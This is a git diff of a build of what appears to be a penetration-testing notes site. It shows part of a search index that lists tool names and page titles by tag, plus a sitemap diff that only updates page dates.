                                            ","tags":["tags"]},{"location":"tags/#tool","title":"tool","text":"
                                            • dirb - A web content enumeration tool
• feroxbuster - A web content enumeration tool for unreferenced resources
                                            • Markdown
• postfix - An SMTP server
                                            • xsltproc
                                            ","tags":["tags"]},{"location":"tags/#tools","title":"toolS","text":"
                                            • Network traffic capture tools
                                            ","tags":["tags"]},{"location":"tags/#tools_1","title":"tools","text":"
                                            • Port 5985, 5986 - WinRM - Windows Remote Management
                                            • The ActiveDirectory PowerShell module
                                            • Amass
                                            • apktool
                                            • arjun
• arpspoof from dsniff
                                            • BeEF - The browser exploitation framework project
                                            • BloodHound
                                            • braa - SNMP scanner
                                            • Pentesting browsers
                                            • Burpsuite
                                            • cewl - A custom dictionary generator
                                            • Tools for cloning a site
                                            • crunch - A dictionary generator
• crt.sh
                                            • CUPP - Common User Password Profiler
                                            • curl
                                            • darkarmour
• Dictionary and wordlist resources
                                            • dig axfr
                                            • dnsenum - A tool to enumerate DNS
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • evil-winrm
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                            • figlet
• Immunity Debugger
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • mythic
                                            • nishang
                                            • nslookup
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                            • Phpggc - A tool for PHP deserialization
                                            • PowerUp.ps1
                                            • rdesktop
• Responder.py - An SMB server to listen for NTLM hashes
                                            • rpcclient - A tool for interacting with smb shares
                                            • Remote Server Administration Tools (RSAT)
                                            • SharpView
                                            • smbclient - A tool for interacting with smb shares
                                            • smbmap
                                            • snmpwalk - SNMP scanner
• sqlplus - Connect to and manage the Oracle RDBMS
• sshpass - A program to pass passwords to ssh on the command line
• The Harvester - A tool for passive and active reconnaissance
                                            • vnstat - Monitoring network impact
                                            • waybackurls
                                            • xfreerdp
                                            • Ysoserial - A tool for Java deserialization
                                            • Tools for pentesting thick client applications
                                            • Creating malware and custom payloads
                                            ","tags":["tags"]},{"location":"tags/#traffic-tool","title":"traffic tool","text":"
                                            • CFF explorer
                                            ","tags":["tags"]},{"location":"tags/#visual-code-grepper","title":"visual code grepper","text":"
                                            • Common vulnerabilities
                                            ","tags":["tags"]},{"location":"tags/#vpn","title":"vpn","text":"
                                            • VPN notes
                                            ","tags":["tags"]},{"location":"tags/#vsftpd","title":"vsFTPd","text":"
                                            • 21 ftp
                                            ","tags":["tags"]},{"location":"tags/#vulnerability","title":"vulnerability","text":"
                                            • dirb - A web content enumeration tool
                                            ","tags":["tags"]},{"location":"tags/#vulnerability-assessment","title":"vulnerability assessment","text":"
                                            • Nessus
                                            • OpenVAS
• OpenVAS Reporting
                                            ","tags":["tags"]},{"location":"tags/#walkthrough","title":"walkthrough","text":"
                                            • Appointment - A HackTheBox machine
                                            • Archetype - A HackTheBox machine
                                            • Bank - A HackTheBox machine
                                            • Base - A HackTheBox machine
                                            • Crocodile - A HackTheBox machine
                                            • Explosion - A HackTheBox machine
                                            • Walkthrough - Friendzone - A HackTheBox machine
                                            • Walkthrough - A HackTheBox machine - Funnel
                                            • Ignition - A HackTheBox machine
                                            • Walkthrough - Included - A HackTheBox machine
                                            • Lame - A HackTheBox machine
                                            • Markup - A HackTheBox machine
                                            • Walkthrough - Metatwo - A HackTheBox machine
• Walkthrough - A HackTheBox machine - Mongod
                                            • Nibbles - A HackTheBox machine
                                            • Nunchucks - A HackTheBox machine
                                            • Walkthrough - Omni - A HackTheBox machine
• Oopsie - A HackTheBox machine
                                            • Pennyworth - A HackTheBox machine
                                            • Walkthrough - Photobomb - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
                                            • Walkthrough - A HackTheBox machine - Redeemer
                                            • Responder - A HackTheBox machine
                                            • Sequel - A HackTheBox machine
                                            • Walkthrough - Support - A HackTheBox machine
                                            • Tactics - A HackTheBox machine
                                            • Walkthrough - Trick - A HackTheBox machine
                                            • Walkthrough - Unified - A HackTheBox machine
                                            • Walkthrough - Usage - A HackTheBox machine
• Vaccine - A HackTheBox machine
                                            • Walkthrough - GoldenEye 1, a vulnhub machine
                                            • Vulnhub Raven 1
                                            • Vulnhub Raven 2
                                            • Index of walkthroughs
                                            ","tags":["tags"]},{"location":"tags/#web","title":"web","text":"
                                            • Gopherus
                                            • Information gathering
                                            • netcraft
                                            • Reverse Shells
                                            • Weevely - A PHP webshell backdoor generator
                                            • OWASP Web Security Testing Guide
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            • Map Execution Paths through applications - OWASP Web Security Testing Guide
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            • Map Application architecture - OWASP Web Security Testing Guide
                                            • Web Exploitation Guide
                                            • Arbitrary file upload
                                            • CSRF attack - Cross Site Request Forgery
                                            • Insecure deserialization
                                            • Json Web Token attacks
                                            • NoSQL injection
                                            ","tags":["tags"]},{"location":"tags/#web-enumeration","title":"web enumeration","text":"
• feroxbuster - A web content enumeration tool for unreferenced resources
                                            ","tags":["tags"]},{"location":"tags/#web-pentesting","title":"web pentesting","text":"
                                            • 22 ssh
                                            • 3128 squid
• Aquatone - Automate web scanning across large subdomain lists
                                            • BeEF - The browser exploitation framework project
                                            • Bind Shells
                                            • Burpsuite
                                            • cewl - A custom dictionary generator
                                            • Tools for cloning a site
                                            • crunch - A dictionary generator
                                            • CUPP - Common User Password Profiler
• Dictionary and wordlist resources
                                            • django pentesting
                                            • eWPT Preparation
                                            • EyeWitness
                                            • ffuf - A fast web fuzzer written in Go
                                            • Responder - A HackTheBox machine
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • knockpy - A subdomain scanner
                                            • Laudanum - Injectable Web Exploit Code
                                            • Lazagne
                                            • Log4j
                                            • moodlescan
                                            • nikto
                                            • searchsploit
                                            • sslyze - A tool for scanning certificates
                                            • Pentesting Tomcat
                                            • veil - A backdoor generator
                                            • Vulnhub Raven 1
                                            • Vulnhub Raven 2
                                            • w3af
                                            • WafW00f - A firewall scanner
                                            • wfuzz
                                            • whatweb - A web scanner
• wpscan - WordPress Security Scanner
                                            • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                                            • Testing GraphQL - OWASP Web Security Testing Guide
                                            • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                                            • Testing for Default Credentials - OWASP Web Security Testing Guide
                                            • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                                            • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                                            • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                                            • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                                            • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                                            • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                                            • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                                            • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                                            • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                                            • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                                            • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                                            • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                                            • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                                            • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                                            • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                                            • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                                            • Test Integrity Checks - OWASP Web Security Testing Guide
                                            • Test for Process Timing - OWASP Web Security Testing Guide
                                            • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                                            • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                                            • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                                            • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                                            • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                                            • Test Payment Functionality - OWASP Web Security Testing Guide
                                            • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                                            • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                                            • Testing for HTML Injection - OWASP Web Security Testing Guide
                                            • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                                            • Testing for CSS Injection - OWASP Web Security Testing Guide
                                            • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                                            • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                                            • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
• Testing for Clickjacking - OWASP Web Security Testing Guide
                                            • Testing WebSockets - OWASP Web Security Testing Guide
                                            • Testing Web Messaging - OWASP Web Security Testing Guide
                                            • Testing Browser Storage - OWASP Web Security Testing Guide
                                            • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                                            • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                            • Test Application Platform Configuration - OWASP Web Security Testing Guide
                                            • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                                            • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                                            • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                                            • Test HTTP Methods - OWASP Web Security Testing Guide
                                            • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                                            • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                                            • Test File Permission - OWASP Web Security Testing Guide
                                            • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                                            • Test Cloud Storage - OWASP Web Security Testing Guide
                                            • Testing for Content Security Policy - OWASP Web Security Testing Guide
                                            • Test Path Confusion - OWASP Web Security Testing Guide
                                            • Testing for Weak Transport Layer Security - OWASP Web Security Testing Guide
                                            • Testing for Padding Oracle - OWASP Web Security Testing Guide
                                            • Testing for Sensitive Information Sent via Unencrypted Channels - OWASP Web Security Testing Guide
                                            • Testing for Weak Encryption - OWASP Web Security Testing Guide
                                            • Testing for Improper Error Handling - OWASP Web Security Testing Guide
                                            • Testing for Stack Traces - OWASP Web Security Testing Guide
                                            • Test Role Definitions - OWASP Web Security Testing Guide
                                            • Test User Registration Process - OWASP Web Security Testing Guide
                                            • Test Account Provisioning Process - OWASP Web Security Testing Guide
                                            • Testing for Account Enumeration and Guessable User Account - OWASP Web Security Testing Guide
                                            • Testing for Weak or Unenforced Username Policy - OWASP Web Security Testing Guide
                                            • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                                            • Fingerprint Web Server - OWASP Web Security Testing Guide
                                            • Testing for Reflected Cross Site Scripting - OWASP Web Security Testing Guide
                                            • Testing for Stored Cross Site Scripting - OWASP Web Security Testing Guide
                                            • Testing for HTTP Verb Tampering - OWASP Web Security Testing Guide
                                            • Testing for HTTP Parameter Pollution - OWASP Web Security Testing Guide
                                            • Testing for SQL Injection - OWASP Web Security Testing Guide
                                            • Testing for LDAP Injection - OWASP Web Security Testing Guide
                                            • Testing for XML Injection - OWASP Web Security Testing Guide
                                            • Testing for SSI Injection - OWASP Web Security Testing Guide
                                            • Testing for XPath Injection - OWASP Web Security Testing Guide
                                            • Testing for IMAP SMTP Injection - OWASP Web Security Testing Guide
                                            • Testing for Code Injection - OWASP Web Security Testing Guide
                                            • Testing for Command Injection - OWASP Web Security Testing Guide
                                            • Testing for Format String Injection - OWASP Web Security Testing Guide
                                            • Testing for Incubated Vulnerability - OWASP Web Security Testing Guide
                                            • Testing for HTTP Splitting Smuggling - OWASP Web Security Testing Guide
                                            • Testing for HTTP Incoming Requests - OWASP Web Security Testing Guide
                                            • Testing for Host Header Injection - OWASP Web Security Testing Guide
                                            • Testing for Server-side Template Injection - OWASP Web Security Testing Guide
                                            • Testing for Server-Side Request Forgery - OWASP Web Security Testing Guide
                                            • Testing for Mass Assignment - OWASP Web Security Testing Guide
                                            • Testing for Session Management Schema - OWASP Web Security Testing Guide
                                            • Testing for Cookies Attributes - OWASP Web Security Testing Guide
                                            • Testing for Session Fixation - OWASP Web Security Testing Guide
                                            • Testing for Exposed Session Variables - OWASP Web Security Testing Guide
                                            • Testing for Cross Site Request Forgery - OWASP Web Security Testing Guide
                                            • Testing for Logout Functionality - OWASP Web Security Testing Guide
                                            • Testing Session Timeout - OWASP Web Security Testing Guide
                                            • Testing for Session Puzzling - OWASP Web Security Testing Guide
                                            • Testing for Session Hijacking - OWASP Web Security Testing Guide
                                            • Testing JSON Web Tokens - OWASP Web Security Testing Guide
                                            • Broken access control
                                            • Buffer Overflow attack
                                            • Captcha Replay attack
                                            • Carriage Return and Linefeed - CRLF Attack
                                            • XFS attack - Cross-frame Scripting
                                            • XSS attack - Cross-Site Scripting
                                            • Directory Traversal attack
                                            • LFI attack - Local File Inclusion
                                            • Creating malware and custom payloads
                                            • PHP Type Juggling Vulnerabilities
                                            • RFD attack - Reflected File Download
                                            • RCE attack - Remote Code Execution
                                            • RFI attack - Remote File Inclusion
                                            • SSRF attack - Server Side Request Forgery
                                            • Server-side Template Injection - SSTI
                                            • Session Puzzling - Session Variable Overloading
                                            • SQL injection
                                            ","tags":["tags"]},{"location":"tags/#web-server","title":"web server","text":"
                                            • httprint - A web server fingerprinting tool
                                            ","tags":["tags"]},{"location":"tags/#web-shells","title":"web shells","text":"
                                            • Laudanum - Injectable Web Exploit Code
                                            ","tags":["tags"]},{"location":"tags/#webpentesting","title":"webpentesting","text":"
• Pentesting OData
                                            • Phpggc - A tool for PHP deserialization
                                            • Ysoserial - A tool for Java deserialization
                                            ","tags":["tags"]},{"location":"tags/#webservices","title":"webservices","text":"
                                            • Pentesting web services
                                            ","tags":["tags"]},{"location":"tags/#webshell","title":"webshell","text":"
                                            • Web Shells
                                            • WhiteWinterWolf php webshell
                                            ","tags":["tags"]},{"location":"tags/#windows","title":"windows","text":"
                                            • Port 389 - 636 LDAP
                                            • Active Directory - LDAP
                                            • The ActiveDirectory PowerShell module
• ARP poisoning
• arpspoof from dsniff
                                            • BloodHound
                                            • CFF explorer
                                            • CrackMapExec
                                            • enum
                                            • enum4linux
                                            • Markup - A HackTheBox machine
                                            • Tactics - A HackTheBox machine
                                            • hydra
                                            • SMBExec - a module from Impacket
                                            • Impacket - A python tool for network protocols
                                            • Index for Windows Privilege Escalation
                                            • Invoke-TheHash
                                            • medusa
                                            • mimikatz
• mitm_relay
                                            • Microsoft Management Console (MMC)
                                            • NetBIOS - Network Basic Input Output System
                                            • NT Authority System
                                            • Pass The Hash
                                            • PowerUp.ps1
• pyftpdlib - An FTP server written in Python
                                            • pypykatz
                                            • rdesktop
• Responder.py - An SMB server to listen for NTLM hashes
                                            • SharpView
                                            • SirepRAT - RCE as SYSTEM on Windows IoT Core
                                            • SysInternals Suite
                                            • Transferring files techniques - Windows
                                            • Virtualbox and Extension Pack
• WebDAV - WsgiDAV - A generic and extendable WebDAV server
                                            • Window Detective - A tool to view windows properties in the system
                                            • Windows binaries - LOLBAS
                                            • Windows credentials storage
                                            • Recently accessed files and executed commands
                                            • winPEAS - Windows Privilege Escalation Awesome Scripts
                                            • winspy - A tool to view windows properties in the system
                                            • xfreerdp
                                            • HTTP Authentication Schemes
                                            ","tags":["tags"]},{"location":"tags/#windows-pentesting","title":"windows pentesting","text":"
                                            • JAWS - Just Another Windows (Enum) Script
                                            • Seatbelt - A tool to scan Windows system
                                            ","tags":["tags"]},{"location":"tags/#windows-privilege-escalation","title":"windows privilege escalation","text":"
                                            • Privilege escalation - Weak service file permission
                                            ","tags":["tags"]},{"location":"tags/#windows-remote-management","title":"windows remote management","text":"
                                            • evil-winrm
                                            ","tags":["tags"]},{"location":"tags/#winrm","title":"winrm","text":"
                                            • Port 5985, 5986 - WinRM - Windows Remote Management
                                            ","tags":["tags"]},{"location":"tags/#wireshark","title":"wireshark","text":"
                                            • Information gathering phase - Thick client Applications
                                            • Traffic analysis - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#wordpress","title":"wordpress","text":"
                                            • Pentesting Keycloak
                                            • pentesting wordpress
• wpscan - WordPress Security Scanner
                                            ","tags":["tags"]},{"location":"tags/#xor-encryption","title":"xor encryption","text":"
                                            • Bypassing IPS with handmade XOR Encryption
                                            ","tags":["tags"]},{"location":"tags/#xss","title":"xss","text":"
                                            • BurpSuite Labs - Cross-site Scripting
                                            • XSS attack - Cross-Site Scripting
                                            ","tags":["tags"]},{"location":"tags/#xxe","title":"xxe","text":"
                                            • Markup - A HackTheBox machine
                                            • XXE - XEE XML External Entity attack
                                            ","tags":["tags"]}]} \ No newline at end of file diff --git a/sitemap.xml b/sitemap.xml index 9253bcbe4a..516e4353e9 100644 --- a/sitemap.xml +++ b/sitemap.xml @@ -2,2767 +2,2767 @@ https://amandaguglieri.github.io/hackinglife/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/0-255-ICMP-internet-control-message-protocol/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/1090-java-rmi/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/110-143-993-995-imap-pop3/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/111-32731-rpc/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/135-windows-management-instrumentation-wmi/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/137-138-139-445-smb/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/1433-mssql/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/1521-oracle-transparent-network-substrate/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/161-162-snmp/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/1720-5060-5061-voip/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/2049-nfs-network-file-system/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/21-ftp/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/22-ssh/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/23-telnet/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/25-565-587-simple-mail-tranfer-protocol-smtp/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/27017-27018-mongodb/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/3128-squid/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/3306-mariadb-mysql/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/3389-rdp/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/389-636-ldap/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/43-whois/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/512-513-514-r-services/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/53-dns/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/5432-postgresql/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/55007-55008-dovecot/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/5985-5986-winrm-windows-remote-management/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/623-intelligent-platform-management-interface-ipmi/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/6379-redis/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/6653-openflow/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/69-tftp/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/7z/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/8080-jboss/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/873-rsync/ - 2024-06-07 + 2024-06-08 daily 
https://amandaguglieri.github.io/hackinglife/acronyms/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/active-directory-ldap/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/activedirectory-powershell-module/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/amass/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/android-debug-bridge/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/apktool/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/apt-packet-manager/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/aquatone/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/arjun/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/arp-poisoning/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/arpspoof-dniff/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/attacking-lsass/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/attacking-sam/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/aws-cli/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/azure-cli/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/azure-powershell/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/bash/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/beef/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/bind-shells/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/bloodhound/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/braa/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/browsers-pentesting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/burpsuite/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cewl/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cff-explorer/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/checksum/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cloning-a-site/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/computer-forensic-fundamentals/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/configuration-files/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/contract-checklist/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/contractor-agreement-checklist/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cpts-index/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cpts-labs/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/crackmapexec/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/create-a-registry/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cron-jobs/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/crunch/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cryptography/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ctr/ - 2024-06-07 + 
2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cupp-common-user-password-profiler/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/curl/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cve-common-vulnerabilities-and-exposures/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/cvss-common-vulnerability-scoring-system/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/darkarmour/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/data-encoding/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dictionaries/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dig/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dirb/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dirty-cow/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/django-pentesting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dnscan/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dnsenum/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dnspy/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dnsrecon/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/docker/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dotpeek/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/dread/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/drozer/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/echo-mirage/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ejpt/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/emacs/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/empire/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/enum/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/enum4linux/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/evil-winrm/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ewpt-preparation/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/exiftool/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/eyewitness/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/fatrat/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/feroxbuster/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/ffuf/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/fierce/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/figlet/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/file-encryption/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/footprinting/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/fping/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/frida/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/gcloud-cli/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/git/ - 
[sitemap.xml diff condensed from flattened extraction: every <url> entry in the sitemap, from https://amandaguglieri.github.io/hackinglife/github-dorks/ through https://amandaguglieri.github.io/hackinglife/tags/ (including the OWASP/, RFID/, burpsuite/, cloud/, hackingapis/, python/, thick-applications/, and webexploitation/ sections), carries the same one-line change: the <lastmod> date is bumped from 2024-06-07 to 2024-06-08, while the <loc> URL and <changefreq>daily</changefreq> values are unchanged]
\ No newline at end of file
diff --git a/sitemap.xml.gz b/sitemap.xml.gz
index 9f7186fbbd2bd29a4e89353de42b94b8f20ba117..5473cf2b157fddc2eabe4952508cf92ea6f30d7e 100644
GIT binary patch
delta 4650
[base85-encoded binary delta for sitemap.xml.gz elided]